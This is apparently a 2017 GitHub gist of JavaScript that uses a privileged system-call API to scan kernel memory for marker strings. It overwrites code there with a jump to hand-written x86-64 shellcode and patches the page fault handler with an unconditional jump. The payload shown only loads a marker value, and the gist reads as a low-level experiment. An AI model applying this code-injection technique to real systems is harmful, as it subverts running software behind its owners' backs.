@McSimp
Created September 24, 2017 16:25
// Progress marker; every later step in this script logs in the same way.
console.log("Starting");
/**
 * Linear byte-pattern search over the mapped system memory range.
 *
 * Maps the range starting at offset 1 (0x7FFFFFFF bytes requested) and
 * checks the first 0x2000000 positions for `lookFor`.
 *
 * @param {number[]} lookFor - Byte values to match in order. An empty
 *   pattern matches at the very first position.
 * @returns {number|null} Address of the first match (scan index plus the
 *   start offset), or null when nothing matches inside the scanned window.
 */
function findData(lookFor) {
  const MEM_START_OFFSET = 1;
  const SCAN_LIMIT = 0x2000000;
  const region = __SYSCALL.getSystemResources().memoryRange.block(MEM_START_OFFSET, 0x7FFFFFFF);
  const bytes = new Uint8Array(region.buffer());
  const patternLength = lookFor.length;

  scan: for (let pos = 0; pos < SCAN_LIMIT; pos++) {
    for (let k = 0; k < patternLength; k++) {
      // Loose comparison kept deliberately to match the original behaviour.
      if (bytes[pos + k] != lookFor[k]) {
        continue scan;
      }
    }
    return pos + MEM_START_OFFSET;
  }
  return null;
}
/**
 * Formats a byte value as two lowercase hexadecimal digits.
 *
 * @param {number} d - Value to format. Single-digit results are left-padded
 *   with "0"; longer results (values above 0xff) are returned unchanged.
 * @returns {string} Hexadecimal text, at least two characters long.
 */
function decToHex(d) {
  return d.toString(16).padStart(2, "0");
}
/**
 * Reads `size` bytes of the mapped memory block at `start` and renders them
 * as one continuous lowercase hex string (two characters per byte).
 *
 * @param {number} start - Address passed to memoryRange.block().
 * @param {number} size - Number of bytes to read and render.
 * @returns {string} Hex dump with no separators; "" when size is 0.
 */
function dumpMem(start, size) {
  const region = __SYSCALL.getSystemResources().memoryRange.block(start, size);
  const bytes = new Uint8Array(region.buffer());
  // Iterate by the requested size rather than the view length, as the
  // original did, so both agree on what is read.
  return Array.from({ length: size }, (_, idx) => decToHex(bytes[idx])).join("");
}
/**
 * Copies `data` byte by byte into the mapped memory block at `writeTo`.
 *
 * @param {number[]} data - Byte values to store; data.length bytes are
 *   requested from memoryRange.block().
 * @param {number} writeTo - Destination address of the first byte.
 * @returns {void}
 */
function writeData(writeTo, data) {
  const region = __SYSCALL.getSystemResources().memoryRange.block(writeTo, data.length);
  const target = new Uint8Array(region.buffer());
  // Element-wise assignment (not TypedArray.set) so writes past the view's
  // length are dropped silently, exactly as before.
  for (const [idx, value] of data.entries()) {
    target[idx] = value;
  }
}
/**
 * Writes several byte arrays back to back, starting at `writeTo`.
 *
 * Each chunk is handed to writeData() at the running offset; the offset then
 * advances by that chunk's length, so chunks are laid out contiguously.
 *
 * @param {number} writeTo - Address of the first byte of the first chunk.
 * @param {number[][]} datas - Chunks to write, in order.
 * @returns {void}
 */
function writeMultipleData(writeTo, datas) {
  datas.reduce((cursor, chunk) => {
    writeData(writeTo + cursor, chunk);
    return cursor + chunk.length;
  }, 0);
}
/**
 * Splits a value into its four low-order bytes, least significant first
 * (little-endian imm32 layout, as used by the instruction listings below).
 *
 * @param {number} pointer - Value to encode. `>>` operates on 32 bits, so
 *   only the low 32 bits contribute; NOTE(review): anything above that is
 *   discarded silently, which is acceptable for imm32 operands but not for
 *   full 64-bit values.
 * @returns {number[]} Four bytes in the range 0..255.
 */
function pointerToBytes(pointer) {
  return Array.from({ length: 4 }, (_, byteIndex) => (pointer >> (byteIndex * 8)) & 0xFF);
}
// Locate the literal marker string in the scanned range, then the first
// 4-byte little-endian pointer to it (see pointerToBytes).
// NOTE(review): findData() returns null on a miss; the .toString(16) calls
// below then throw a TypeError instead of reporting which search failed.
var dbgStrAddr = findData(" --- DEBUG --- ".split('').map((char) => char.charCodeAt(0)));
console.log("Found debug string at: ", dbgStrAddr.toString(16));
var dbgStrUsageAddr = findData(pointerToBytes(dbgStrAddr));
console.log("Found debug string usage at: ", dbgStrUsageAddr.toString(16));
// DMA buffer that receives the code bytes listed further down.
var codeBuf = __SYSCALL.allocDMA();
console.log("Allocated buffer for shellcode at: ", codeBuf.address.toString(16));
/*
0: 48 c7 c3 00 00 e0 1c mov rbx,0x1ce00000
7: ff e3 jmp rbx
*/
// The imm32 from the listing above is substituted with codeBuf.address at
// run time; only its low 32 bits are encoded (see pointerToBytes).
var jmpData = [
[0x48, 0xc7, 0xc3], pointerToBytes(codeBuf.address),
[0xff, 0xe3]
];
// Nine bytes written at a hard-coded offset (-5) from the located pointer
// usage. NOTE(review): nothing reads the existing bytes before they are
// overwritten (dumpMem is defined but never called in this script).
writeMultipleData(dbgStrUsageAddr - 5, jmpData);
/*
0: 48 83 c4 08 add rsp,0x8
4: 48 bf ef ee be ad de movabs rdi,0xdeadbeeeef
b: 00 00 00
e: 48 c7 c3 78 56 34 12 mov rbx,0x12345678
15: ff e3 jmp rbx
*/
// The mov rbx immediate from the listing is replaced by the return target
// (dbgStrUsageAddr + 4); the movabs immediate is written as-is.
var shellcode = [
[0x48, 0x83, 0xc4, 0x08],
[0x48, 0xbf, 0xef, 0xee, 0xbe, 0xad, 0xde, 0x00, 0x00, 0x00],
[0x48, 0xc7, 0xc3], pointerToBytes(dbgStrUsageAddr + 4),
[0xff, 0xe3]
];
writeMultipleData(codeBuf.address, shellcode);
// Same locate-string / locate-pointer sequence as above; the same null
// caveat applies to the .toString(16) calls.
var invalidStrAddr = findData("Invalid Faulting address = %p".split('').map((char) => char.charCodeAt(0)));
console.log("Found page fault string at: ", invalidStrAddr.toString(16));
var invalidStrUsageAddr = findData(pointerToBytes(invalidStrAddr));
console.log("Found page fault string usage at: ", invalidStrUsageAddr.toString(16));
// Set unconditional jump in page fault handler
// Single-byte write at a hard-coded offset (-251); as with the patch above,
// the byte being replaced is not inspected first.
writeData(invalidStrUsageAddr - 251, [0xEB]);
console.log("Finished writing shellcode");
// NOTE(review): presumably exercises the patched code path — confirm against
// the __SYSCALL.debug() contract.
__SYSCALL.debug();
console.log("Finished calling debug");